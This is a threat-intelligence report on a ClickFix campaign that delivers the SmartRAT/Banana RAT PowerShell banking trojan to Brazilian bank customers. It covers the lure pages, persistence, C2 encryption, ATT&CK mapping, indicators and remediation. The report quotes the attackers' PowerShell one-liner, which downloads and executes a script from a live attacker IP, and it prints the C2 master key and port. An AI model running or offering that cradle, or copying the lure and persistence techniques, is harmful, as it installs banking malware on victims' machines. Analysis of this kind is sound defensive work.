Threat reportMalwareTL-2026-0841

AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT PowerShell Banking Trojan Targeting Brazilian Financial Sector

highACTIVE

AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT (TL-2026-0841), also tracked as SmartRAT, is a high-severity malware campaign, first published 2026-06-17 and last reviewed 2026-08-31. It is attributed to SHADOW-WATER-063 (Brazil) with medium confidence, affects Microsoft Windows (PowerShell-enabled endpoints), maps to 36 MITRE ATT&CK techniques (T1005, T1008, T1010), and is covered by 9 detection rules and 30 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
36MITRE ATT&CK
Actors
1SHADOW-WATER-063
Detection rules
9SPL · KQL · Sigma
IOCs
30Indicators of compromise

Key facts for TL-2026-0841

Threat ID
TL-2026-0841
Also known as
SmartRAT, Banana RAT, SMART_V25
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
SHADOW-WATER-063
Attribution confidence
MEDIUM
Nation-state nexus
Brazil
Motivation
FINANCIAL
Target sectors
financial, banking, payments, cryptocurrency
Target regions
Brazil, South America, Latin America
Detection rules
9
Indicators of compromise
30
Updates
2026-08-31 · revalidated 1× · latest source

Malware and tooling in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

Malware and tooling: Banana RAT, SmartRAT

How AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT works

A financially motivated actor (tracked by Trend Micro as SHADOW-WATER-063) used AI-built typosquatting sites impersonating Brazilian banks and a ClickFix lure (fake Cloudflare CAPTCHA followed by a fullscreen fake BSOD) to coerce victims into running a malicious PowerShell command via Win+R. The chain delivers SmartRAT (internal string SMART_V25; aka Banana RAT) — a PowerShell/C# banking RAT featuring AES-CBC C2, multi-path persistence as MicrosoftEdgeUpdateCore, real-time screen streaming, overlay injection, and PIX/QR transaction manipulation against Brazilian banks, payment platforms, and crypto exchanges.

Zscaler ThreatLabz and Trend Micro independently documented an active banking-fraud campaign against the Brazilian financial sector first observed in March 2026. Threat actors leveraged AI website-building tools to rapidly stand up convincing typosquatting domains (e.g. cartaobb.com impersonating Banco do Brasil's Cartao BB, crefisa.online, vfsgloball.net). Source-code artifacts — templated AI-style section-header comments and a C2 panel containing verbose explanatory comments and emoticons — indicate large-language-model assistance in both the lure pages and the operator backend.

The delivery uses the ClickFix social-engineering technique. A victim landing on the AI-generated page is shown a fake Cloudflare CAPTCHA on a page that disables DevTools and clears the console. Clicking the CAPTCHA forces the browser fullscreen and renders a fake Windows BSOD/system-recovery prompt. Anti-escape logic (navigator.keyboard.lock(), capture-phase keydown handlers, and window.focus() loops) traps the user while still permitting Win+R, Ctrl+V, and Enter. A PowerShell one-liner is silently placed on the clipboard: powershell "$k8='http://64.95.13.238/st.txt';iex(irm $k8)" with randomized trailing whitespace to defeat hash-based blocking.

Execution retrieves st.txt, which hides its console via ShowWindow(), downloads payload.php from the same host, saves it under the decoy name msedge.txt, and runs it via ScriptBlock::Create(). payload.php Base64-decodes a hardcoded AES key/IV and performs AES-CBC decryption of an embedded blob to reconstruct SmartRAT (identified by the embedded string SMART_V25), which then XOR-decrypts its C2 configuration. The Trend Micro reporting describes a FastAPI-based polymorphic crypter generating 100-200 hash-unique builds per campaign and nine custom PowerShell obfuscation layers.

SmartRAT establishes persistence as MicrosoftEdgeUpdateCore across three privilege paths: a logon-triggered Scheduled Task pointing at %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt (UAC success), an HKCU Run key fallback (UAC denied), and a SYSTEM-level Windows Service compiled in-memory via csc.exe and launched with DuplicateTokenEx / CreateProcessAsUser (elevated). A watchdog respawns every 5 seconds. C2 uses raw TCP on port 51888 plus HTTP (port 80) and TLS (port 443) channels, with AES-CBC (key = SHA-256 of master key iuhbdaubdvauygd5562$3@##$r, HMAC-SHA256 integrity, fresh per-message IV in ivHex:ciphertextHex format) and a binary message-framing protocol. The RAT delivers real-time screen streaming, operator input control, banking-aware overlay injection, QR/PIX transaction tampering, and keylogging, watching window titles for Santander, Bradesco, Itau, Caixa, Banco do Brasil, Nubank, Inter, C6 Bank, Safra, BTG, Sicoob, Sicredi, Mercado Pago, PicPay, PagSeguro, PayPal, Binance, and Mercado Bitcoin.

MITRE ATT&CK techniques used in TL-2026-0841

Collection

T1005 Data from Local System; T1113 Screen Capture; T1185 Browser Session Hijacking

Command and Control

T1008 Fallback Channels; T1071.001 Web Protocols; T1105 Ingress Tool Transfer; T1571 Non-Standard Port; T1573.001 Symmetric Cryptography; T1659 Content Injection

Discovery

T1010 Application Window Discovery; T1057 Process Discovery; T1082 System Information Discovery

Defense Evasion

T1027 Obfuscated Files or Information; T1036 Masquerading; T1036.005 Match Legitimate Resource Name or Location; T1070.004 File Deletion; T1140 Deobfuscate/Decode Files or Information; T1564.003 Hidden Window; T1620 Reflective Code Loading

Exfiltration

T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Persistence

T1053.005 Scheduled Task; T1543.003 Windows Service; T1547.001 Registry Run Keys / Startup Folder

Credential Access

T1056.001 Keylogging

Execution

T1059.001 PowerShell; T1204.001 Malicious Link; T1204.004 User Execution: Malicious Copy and Paste; T1569.002 Service Execution

Privilege Escalation

T1134.001 Token Impersonation/Theft; T1134.002 Create Process with Token; T1548.002 Bypass User Account Control

Initial Access

T1189 Drive-by Compromise; T1566 Phishing; T1566.002 Spearphishing Link

Resource Development

T1583.001 Acquire Infrastructure: Domains

Impact

T1657 Financial Theft

Affected products and versions in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

  • Microsoft — Windows (PowerShell-enabled endpoints)
    Vulnerable versions: Windows 10; Windows 11; Windows Server

Remediation for AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

Immediate actions

  • Block C2 IPs 64.95.13.238, 162.141.111.227, and 24.199.90.58 and typosquat/C2 domains cartaobb.com, crefisa.online, vfsgloball.net, windowsupdate-cdn.com, c.windowsupdate-cdn.com, c.windowsk-cdn.com at the perimeter and DNS resolver
  • Block outbound TCP to port 51888; alert on raw-socket egress to non-standard high ports
  • Hunt for the scheduled task, Run key, and service all named MicrosoftEdgeUpdateCore and for files under %APPDATA%\Microsoft\Diagnosis\ETW\

Workarounds

  • Block clipboard-injected command execution by restricting PowerShell for standard users
  • Browser policy to prevent untrusted sites from entering fullscreen / locking the keyboard

Longer-term hardening

  • Deploy EDR with PowerShell Script Block Logging (Event ID 4104) and AMSI to catch iex(irm ...) download cradles and in-memory csc.exe compilation
  • Disable or restrict the Win+R Run dialog via GPO (NoRun) for non-technical user populations
  • User-awareness training on ClickFix: never paste-and-run clipboard commands from a webpage prompt
  • Enforce constrained-language-mode PowerShell and application allowlisting

Weaknesses (CWE) in AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

CWE-1021, CWE-506, CWE-829

Timeline of AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

  • Actor stands up AI-built typosquatting domains (cartaobb.com, crefisa.online, vfsgloball.net) and Windows-Update-masquerading C2 (windowsupdate-cdn.com); source-code artifacts (templated AI section-header comments, commented/emoticon-laden C2 panel) indicate large-language-model assistance in both lure pages and operator backend.
  • Zscaler ThreatLabz first observes typosquatting domains hosting malicious AI-generated content impersonating Brazilian banks (e.g. cartaobb.com).
  • ClickFix lure chain (fake Cloudflare CAPTCHA + fullscreen fake BSOD) actively delivering SmartRAT to Brazilian banking victims via Win+R PowerShell download cradle.
  • SmartRAT builds (string SMART_V25) observed performing MicrosoftEdgeUpdateCore multi-path persistence, in-memory csc.exe service compilation, and raw-TCP AES-CBC C2 on port 51888 with HTTP/TLS fallback channels.
  • SOC Prime publishes Sigma detection content for the SHADOW-WATER-063 Banana RAT campaign (build-server-to-banking-fraud chain) for SOC consumption.
  • Trend Micro publishes analysis attributing the Banana RAT operation to financially motivated actor SHADOW-WATER-063, detailing the FastAPI polymorphic crypter (100-200 hash-unique builds per campaign) and nine custom PowerShell obfuscation layers.
  • Secondary reporting (HackRead, CyberSecurityNews) describes NF-e invoice and WhatsApp lures delivering Banana RAT via malicious batch files to customers at 16 major Brazilian banks.
  • Threat ingested into Threadlinqs Intelligence as TL-2026-0841; SmartRAT and Banana RAT correlated as the same PowerShell banking RAT family.
  • Zscaler ThreatLabz publishes the SmartRAT (SMART_V25) technical writeup confirming the AI-generated ClickFix delivery, AES-CBC C2 on port 51888, and MicrosoftEdgeUpdateCore persistence.
  • Security Boulevard and Cybersecurity News republish and corroborate the Zscaler ThreatLabz SmartRAT findings and IOCs.

Update history for TL-2026-0841

Sources cited for AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT

Detection coverage for TL-2026-0841

As of 2026-08-31, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0841 across Splunk SPL, Microsoft KQL and Sigma, covering 30 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
30 indicators of compromise · Red and above. Compare plans

Community OSINT corroboration for TL-2026-0841

3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats